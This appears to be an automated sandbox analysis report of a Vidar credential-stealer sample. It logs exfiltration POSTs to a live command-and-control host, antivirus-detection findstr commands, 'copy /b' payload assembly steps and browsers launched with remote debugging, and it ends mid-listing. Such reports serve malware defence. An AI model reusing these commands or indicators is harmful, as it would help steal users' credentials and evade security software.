                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:52 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----5PP8Q9ZUA1NYMY5FCTR1
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 6985
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:52 UTC6985OUTData Raw: 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------5PP8Q9ZUA1NYMY5FCTR1Cont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:53 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:01:54 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50060 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:53 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GD2NY5P8Q9RQIMYUSJEU
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 117941
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:01:53 UTC | 16355 | OUT | Data Ascii: ------GD2NY5P8Q9RQIMYUSJEUContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------GD2NY5P8Q9RQIMYUSJEUContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------GD2NY5P8Q9RQIMYUSJEUCont
2024-12-27 06:01:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:55 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:01:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                  Start time:00:59:56
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\lem.exe"
                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                  File size:1'273'852 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:5782BEA403267E4A6DDF82263332ED59
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                  Start time:00:59:57
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

Target ID:3
Start time:00:59:57
Start date:27/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:00:59:59
Start date:27/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x890000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:00:59:59
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x7c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:01:00:00
Start date:27/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x890000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:01:00:00
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x7c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:01:00:00
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 105235
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:01:00:00
Start date:27/12/2024
Path:C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):true
Commandline:extrac32 /Y /E Authorization
Imagebase:0xd20000
File size:29'184 bytes
MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:01:00:01
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "aid" Division
Imagebase:0x7c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:01:00:01
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:12
Start time:01:00:01
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:01:00:01
Start date:27/12/2024
Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Wow64 process (32bit):true
Commandline:Inf.com m
Imagebase:0xa10000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418297625.0000000001505000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418561056.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:false

Target ID:14
Start time:01:00:02
Start date:27/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0xd50000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:01:00:54
Start date:27/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:01:00:55
Start date:27/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2028,i,9558792887393012280,750728347199566244,262144 /prefetch:8
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                                                  Start time:01:01:08
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                                                  Start time:01:01:09
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                                                  Start time:01:01:10
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2348,i,16825700261060781497,4542343586263828096,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                                                                  Start time:01:01:10
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2176,i,2777762876112308581,5901726477067019011,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                                                  Start time:01:01:19
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff757150000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                                                  Start time:01:01:20
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2240,i,2906549977917240690,4367615623914022411,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                                                  Start time:01:01:20
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                                                  Start time:01:01:21
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                                                  Start time:01:01:25
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6504 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                                                  Start time:01:01:25
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false


                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                    Execution Coverage:18.3%
                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                    Signature Coverage:20.9%
                                                                                                                                                                                                                                                                                                    Total number of Nodes:1481
                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:24
403fd9 SendMessageW 4799->4805 4801 403fad SendMessageW 4801->4797 4803 40141d 80 API calls 4802->4803 4803->4805 4805->4800 4806->4801 4807 402392 4808 40145c 18 API calls 4807->4808 4809 402399 4808->4809 4812 407224 4809->4812 4813 406efe 25 API calls 4812->4813 4814 407244 4813->4814 4815 4023a7 4814->4815 4816 40724e lstrcpynW lstrcmpW 4814->4816 4817 407280 4816->4817 4818 407286 lstrcpynW 4816->4818 4817->4818 4818->4815 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 
